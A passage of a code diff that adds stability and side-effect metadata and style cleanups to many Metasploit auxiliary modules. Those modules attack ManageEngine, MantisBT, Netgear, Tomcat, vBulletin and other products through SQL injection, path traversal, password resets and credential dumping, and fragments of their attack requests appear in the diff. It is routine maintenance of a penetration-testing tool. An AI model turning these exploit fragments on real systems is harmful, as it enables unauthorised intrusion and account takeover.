-        'DisclosureDate' => '2014-12-31'
+        'DisclosureDate' => '2014-12-31',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb
+++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb
@@ -36,7 +36,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/114'],
           ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
         ],
-        'DisclosureDate' => '2015-01-28'
+        'DisclosureDate' => '2015-01-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/manageengine_file_download.rb
+++ b/modules/auxiliary/admin/http/manageengine_file_download.rb
@@ -34,7 +34,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/114'],
           ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
         ],
-        'DisclosureDate' => '2015-01-28'
+        'DisclosureDate' => '2015-01-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
+++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
@@ -34,7 +34,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/18' ],
           [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt' ],
         ],
-        'DisclosureDate' => '2014-11-08'
+        'DisclosureDate' => '2014-11-08',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 
@@ -170,7 +175,7 @@ class MetasploitModule < Msf::Auxiliary
       "insert into ptrx_superadmin values (#{user_id},true);"
     sqli_suffix = '-- '
 
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'SQLAdvancedALSearchResult.cc'),
       'cookie' => @cookie,

--- a/modules/auxiliary/admin/http/mantisbt_password_reset.rb
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -26,7 +26,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
         ],
         'Platform' => ['win', 'linux'],
-        'DisclosureDate' => '2017-04-16'
+        'DisclosureDate' => '2017-04-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 
@@ -84,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
-      token = ::Regexp.last_match(1)
+      ::Regexp.last_match(1)
     else
       fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
     end

--- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
+++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
@@ -34,7 +34,12 @@ class MetasploitModule < Msf::Auxiliary
           ['Delete', { 'Description' => 'Delete arbitrary file' }]
         ],
         'DefaultAction' => 'Read',
-        'DisclosureDate' => '2013-05-15'
+        'DisclosureDate' => '2013-05-15',
+        'Notes' => {
+          'Stability' => [OS_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -84,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 200) && res.body =~ (/\{"success":true\}/)
+    if res && (res.code == 200) && res.body =~ /\{"success":true\}/
       print_good("File #{file} copied to #{dst_path} successfully")
     else
       print_error("Failed to copy #{file} to #{dst_path}")
@@ -125,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 200) && res.body =~ (/\{"success":true\}/)
+    if res && (res.code == 200) && res.body =~ /\{"success":true\}/
       print_good("File #{file} deleted")
     else
       print_error("Error deleting file #{file}")
@@ -140,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 200) && res.get_cookies =~ (/JSESSIONID=(.*);/)
+    if res && (res.code == 200) && res.get_cookies =~ /JSESSIONID=(.*);/
       first_session = ::Regexp.last_match(1)
     end
 
@@ -156,7 +161,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if !res || (res.code != 302) || res.headers['Location'] !~ (%r{interface/index.do})
+    if !res || (res.code != 302) || res.headers['Location'] !~ %r{interface/index.do}
       return false
     end
 
@@ -168,7 +173,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 200) && res.get_cookies =~ (/JSESSIONID=(.*);/)
+    if res && (res.code == 200) && res.get_cookies =~ /JSESSIONID=(.*);/
       @session = ::Regexp.last_match(1)
       return true
     end

--- a/modules/auxiliary/admin/http/netflow_file_download.rb
+++ b/modules/auxiliary/admin/http/netflow_file_download.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Dec/9' ],
           [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
         ],
-        'DisclosureDate' => '2014-11-30'
+        'DisclosureDate' => '2014-11-30',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/netgear_auth_download.rb
+++ b/modules/auxiliary/admin/http/netgear_auth_download.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
           ['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30']
         ],
-        'DisclosureDate' => '2016-02-04'
+        'DisclosureDate' => '2016-02-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -166,7 +171,7 @@ class MetasploitModule < Msf::Auxiliary
 
     filepath = datastore['FILEPATH']
     res = download_file(filepath, cookie)
-    if res && res.code == 200 && (res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/))
+    if res && res.code == 200 && res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/)
       save_file(res.body)
       return
     end
@@ -175,7 +180,7 @@ class MetasploitModule < Msf::Auxiliary
     count = 1
     while count < datastore['DEPTH']
       res = download_file(('../' * count).chomp('/') + filepath, cookie)
-      if res && res.code == 200 && (res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/))
+      if res && res.code == 200 && res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/)
         save_file(res.body)
         return
       end

--- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
@@ -37,7 +37,12 @@ class MetasploitModule < Msf::Auxiliary
         'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs
       ],
       'License' => MSF_LICENSE,
-      'DisclosureDate' => 'Feb 11 2015'
+      'DisclosureDate' => 'Feb 11 2015',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
   end
 

--- a/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
+++ b/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
@@ -35,7 +35,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://seclists.org/fulldisclosure/2016/Dec/72'],
           ['URL', 'https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
         ],
-        'DisclosureDate' => '2016-12-20'
+        'DisclosureDate' => '2016-12-20',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
     register_options(
@@ -165,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary
       'data' => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"
     })
     return res
-  rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+  rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
     return
   end
 

--- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
+++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
@@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'DefaultOptions' => {
           'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
         }
       )
     )

--- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb
+++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb
@@ -26,7 +26,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'CVE', '2011-2750' ],
           [ 'OSVDB', '73729' ],
           [ 'URL', 'http://aluigi.org/adv/nfr_2-adv.txt'],
-        ]
+        ],
+        'Notes' => {
+          'Stability' => [OS_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -40,7 +45,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    peer = "#{rhost}:#{rport}"
     record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>5</CMD><PATH>#{datastore['RPATH']}</PATH></RECORD>"
     md5 = Rex::Text.md5('SRS' + record + 'SERVER').upcase
     message = md5 + record
@@ -57,7 +61,7 @@ class MetasploitModule < Msf::Auxiliary
       }, 5
     )
 
-    if res && (res.code == 200) && res.body =~ (%r{<RESULT><VERSION>1</VERSION><STATUS>0</STATUS><TRANSID>0</TRANSID></RESULT>})
+    if res && (res.code == 200) && res.body =~ %r{<RESULT><VERSION>1</VERSION><STATUS>0</STATUS><TRANSID>0</TRANSID></RESULT>}
       print_good("File #{datastore['RPATH']} successfully deleted")
     else
       print_error('File not deleted')

--- a/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
+++ b/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
@@ -31,7 +31,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-nvr-vulns.txt'],
           ['URL', 'https://seclists.org/bugtraq/2016/Aug/45']
         ],
-        'DisclosureDate' => '2016-08-04'
+        'DisclosureDate' => '2016-08-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/openbravo_xxe.rb
+++ b/modules/auxiliary/admin/http/openbravo_xxe.rb
@@ -32,7 +32,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats']
         ],
         'License' => MSF_LICENSE,
-        'DisclosureDate' => '2013-10-30'
+        'DisclosureDate' => '2013-10-30',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -59,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::NoAccess, 'Invalid response. Check your credentials and that the server is correct.')
     end
 
-    xml = path = id = other_id = ''  # for later use
+    xml = path = id = other_id = '' # for later use
     doc = REXML::Document.new users.body
 
     doc.root.elements.each do |user|
@@ -88,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
         'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
       })
 
-      if !resp || (resp.code != 200) || resp.body =~ (/Not updating entity/)
+      if !resp || (resp.code != 200) || resp.body =~ /Not updating entity/
         print_error("Problem updating #{datastore['ENDPOINT']} #{other_id} with ID: #{id}")
         next
       end

--- a/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb
+++ b/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
           Postfixadmin installations between 2.91 and 3.0.1 do not check if an
           admin is allowed to delete protected aliases. This vulnerability can be
           used to redirect protected aliases to an other mail address. Eg. rewrite
-          the postmaster@domain alias
+          the postmaster@domain alias.
         },
         'Author' => [ 'Jan-Frederik Rieckers' ],
         'License' => MSF_LICENSE,
@@ -27,7 +27,12 @@ class MetasploitModule < Msf::Auxiliary
         'Privileged' => true,
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'DisclosureDate' => '2017-02-03'
+        'DisclosureDate' => '2017-02-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
+++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
@@ -35,15 +35,20 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'License' => MSF_LICENSE,
         'References' => [
-          [ 'CVE', '2013-0233'],
-          [ 'OSVDB', '89642' ],
-          [ 'BID', '57577' ],
-          [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'],
-          [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'],
-          [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ],
-          [ 'URL', 'https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8']
+          ['CVE', '2013-0233'],
+          ['OSVDB', '89642'],
+          ['BID', '57577'],
+          ['URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'],
+          ['URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'],
+          ['URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8'],
+          ['URL', 'https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8']
         ],
-        'DisclosureDate' => '2013-01-28'
+        'DisclosureDate' => '2013-01-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 
@@ -89,13 +94,13 @@ class MetasploitModule < Msf::Auxiliary
     count = 0
     status = true
     until (status == false)
-      status = reset_one(Rex::Text.rand_text_alpha(rand(5..14)))
+      status = reset_one(Rex::Text.rand_text_alpha(5..14))
       count += 1 if status
     end
     vprint_status("Cleared #{count} tokens")
   end
 
-  def reset_one(password, report = false)
+  def reset_one(password, report: false)
     (0..datastore['MAXINT']).each do |int_to_try|
       encode_pass = REXML::Text.new(password).to_s
 
@@ -159,7 +164,7 @@ class MetasploitModule < Msf::Auxiliary
     # Reset a password.  We're racing users creating other reset tokens.
     # If we didn't flush, we'll reset the account with the lowest ID that has a token.
     print_status("Resetting password to \"#{datastore['PASSWORD']}\"...")
-    status = reset_one(datastore['PASSWORD'], true)
+    status = reset_one(datastore['PASSWORD'], report: true)
     status ? print_good('Password reset worked successfully') : print_error('Failed to reset password')
   end
 end

--- a/modules/auxiliary/admin/http/scadabr_credential_dump.rb
+++ b/modules/auxiliary/admin/http/scadabr_credential_dump.rb
@@ -25,7 +25,12 @@ class MetasploitModule < Msf::Auxiliary
         'Author' => 'bcoles',
         'License' => MSF_LICENSE,
         'References' => ['URL', 'http://www.scadabr.com.br/?q=node/1375'],
-        'DisclosureDate' => '2017-05-28'
+        'DisclosureDate' => '2017-05-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
     register_options([

--- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb
+++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           'sinn3r'
         ],
         'License' => MSF_LICENSE,
-        'DisclosureDate' => '2012-07-27'
+        'DisclosureDate' => '2012-07-27',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
+++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
@@ -35,7 +35,12 @@ class MetasploitModule < Msf::Auxiliary
         'DefaultOptions' => {
           'SSL' => true
         },
-        'DisclosureDate' => '2013-04-03'
+        'DisclosureDate' => '2013-04-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -60,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 307) && res.body =~ (/The patience page request was not valid/)
+    if res && (res.code == 307) && res.body =~ /The patience page request was not valid/
       return true
     else
       return false

--- a/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb
+++ b/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html']
         ],
         'DisclosureDate' => '2019-06-03',
-        'License' => MSF_LICENSE
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb
+++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
@@ -27,7 +27,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://seclists.org/fulldisclosure/2015/Jun/8' ],
           [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
         ],
-        'DisclosureDate' => '2015-06-03'
+        'DisclosureDate' => '2015-06-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/sysaid_file_download.rb
+++ b/modules/auxiliary/admin/http/sysaid_file_download.rb
@@ -34,7 +34,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://seclists.org/fulldisclosure/2015/Jun/8'],
           ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
         ],
-        'DisclosureDate' => '2015-06-03'
+        'DisclosureDate' => '2015-06-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -30,7 +30,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://seclists.org/fulldisclosure/2015/Jun/8'],
           ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt']
         ],
-        'DisclosureDate' => '2015-06-03'
+        'DisclosureDate' => '2015-06-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/telpho10_credential_dump.rb
+++ b/modules/auxiliary/admin/http/telpho10_credential_dump.rb
@@ -24,7 +24,12 @@ class MetasploitModule < Msf::Auxiliary
         'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
         'Platform' => 'linux',
         'Privileged' => false,
-        'DisclosureDate' => '2016-09-02'
+        'DisclosureDate' => '2016-09-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/tomcat_administration.rb
+++ b/modules/auxiliary/admin/http/tomcat_administration.rb
@@ -18,7 +18,12 @@ class MetasploitModule < Msf::Auxiliary
         ['URL', 'http://tomcat.apache.org/'],
       ],
       'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     register_options(
@@ -44,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
 
     http_fingerprint({ response: res })
 
-    if (res && (res.code == 200))
+    if res && (res.code == 200)
 
       ver = ''
 
@@ -88,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
             'data' => post_data
           }, 25)
 
-          next unless (res && (res.code == 302))
+          next unless res && (res.code == 302)
 
           res = send_request_cgi({
             'uri' => '/admin/',
@@ -96,7 +101,7 @@ class MetasploitModule < Msf::Auxiliary
             'cookie' => "JSESSIONID=#{jsessionid}"
           }, 25)
 
-          next unless (res && (res.code == 302))
+          next unless res && (res.code == 302)
 
           res = send_request_cgi({
             'uri' => '/admin/frameset.jsp',
@@ -104,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
             'cookie' => "JSESSIONID=#{jsessionid}"
           }, 25)
 
-          if (res && (res.code == 200))
+          if res && (res.code == 200)
             print_status("http://#{target_host}:#{rport}/admin [#{res.headers['Server']}] [#{ver}] [Tomcat Server Administration] [#{username}/#{password}]")
           end
 
@@ -117,7 +122,9 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     end
-  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-  rescue ::Timeout::Error, ::Errno::EPIPE
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    vprint_error(e.message)
+  rescue ::Timeout::Error, ::Errno::EPIPE => e
+    vprint_error(e.message)
   end
 end

--- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
+++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
@@ -30,7 +30,12 @@ class MetasploitModule < Msf::Auxiliary
       ],
       'Author' => [ 'aushack', 'guerrino <ruggine> di massa' ],
       'License' => MSF_LICENSE,
-      'DisclosureDate' => 'Jan 9 2009'
+      'DisclosureDate' => 'Jan 9 2009',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
 
     register_options(
@@ -49,12 +54,10 @@ class MetasploitModule < Msf::Auxiliary
   def extract_words(wordfile)
     return [] unless wordfile && File.readable?(wordfile)
 
-    begin
-      File.readlines(wordfile, chomp: true)
-    rescue ::StandardError => e
-      elog(e)
-      []
-    end
+    File.readlines(wordfile, chomp: true)
+  rescue ::StandardError => e
+    elog(e)
+    []
   end
 
   def find_files(files)
@@ -68,11 +71,11 @@ class MetasploitModule < Msf::Auxiliary
           'uri' => normalize_uri(datastore['TARGETURI'], try, files)
         }, 25
       )
-      if (res && (res.code == 200))
+      if res && (res.code == 200)
         print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
         @files_found << files
         break
-      elsif (res && res.code)
+      elsif res && res.code
         vprint_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
       end
     end
@@ -81,32 +84,33 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(_ip)
     @files_found = []
 
-    begin
-      print_status("Attempting to connect to #{rhost}:#{rport}")
-      res = send_request_raw(
-        {
-          'method' => 'GET',
-          'uri' => normalize_uri(datastore['TARGETURI'])
-        }, 25
-      )
+    print_status("Attempting to connect to #{rhost}:#{rport}")
+    res = send_request_raw(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['TARGETURI'])
+      }, 25
+    )
 
-      if res
-        extract_words(datastore['SENSITIVE_FILES']).each do |files|
-          find_files(files) unless files.empty?
-        end
+    if res
+      extract_words(datastore['SENSITIVE_FILES']).each do |files|
+        find_files(files) unless files.empty?
       end
-
-      if !@files_found.empty?
-        print_good('File(s) found:')
-
-        @files_found.each do |f|
-          print_good(f)
-        end
-      else
-        print_error('No File(s) found')
-      end
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    rescue ::Timeout::Error, ::Errno::EPIPE
     end
+
+    if @files_found.empty?
+      print_error('No File(s) found')
+      return
+    end
+
+    print_good('File(s) found:')
+
+    @files_found.each do |f|
+      print_good(f)
+    end
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    vprint_error(e.message)
+  rescue ::Timeout::Error, ::Errno::EPIPE => e
+    vprint_error(e.message)
   end
 end

--- a/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
+++ b/modules/auxiliary/admin/http/typo3_news_module_sqli.rb
@@ -40,7 +40,12 @@ class MetasploitModule < Msf::Auxiliary
         'Privileged' => false,
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'DisclosureDate' => '2017-04-06'
+        'DisclosureDate' => '2017-04-06',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/ulterius_file_download.rb
+++ b/modules/auxiliary/admin/http/ulterius_file_download.rb
@@ -30,7 +30,12 @@ class MetasploitModule < Msf::Auxiliary
         'References' => [
           [ 'EDB', '43141' ],
           [ 'CVE', '2017-16806' ]
-        ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb
+++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'OSVDB', '98370' ],
           [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5']
         ],
-        'DisclosureDate' => '2013-10-09'
+        'DisclosureDate' => '2013-10-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 
@@ -82,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     })
 
-    if res && (res.code == 200) && res.body =~ (/Administrator account created/)
+    if res && (res.code == 200) && res.body =~ /Administrator account created/
       print_good("Admin account with credentials #{user}:#{pass} successfully created")
       connection_details = {
         module_fullname: fullname,

--- a/modules/auxiliary/admin/http/webnms_cred_disclosure.rb
+++ b/modules/auxiliary/admin/http/webnms_cred_disclosure.rb
@@ -31,7 +31,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ]
         ],
-        'DisclosureDate' => '2016-07-04'
+        'DisclosureDate' => '2016-07-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -195,7 +200,6 @@ class MetasploitModule < Msf::Auxiliary
       ending = input[(6 * k)..(input.length)]
       partnum = ''
       if ending.length > 1
-        i = 0
         startnum = false
         for i in 0..(ending.length - 2)
           isthere = false

--- a/modules/auxiliary/admin/http/webnms_file_download.rb
+++ b/modules/auxiliary/admin/http/webnms_file_download.rb
@@ -31,7 +31,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ]
         ],
-        'DisclosureDate' => '2016-07-04'
+        'DisclosureDate' => '2016-07-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
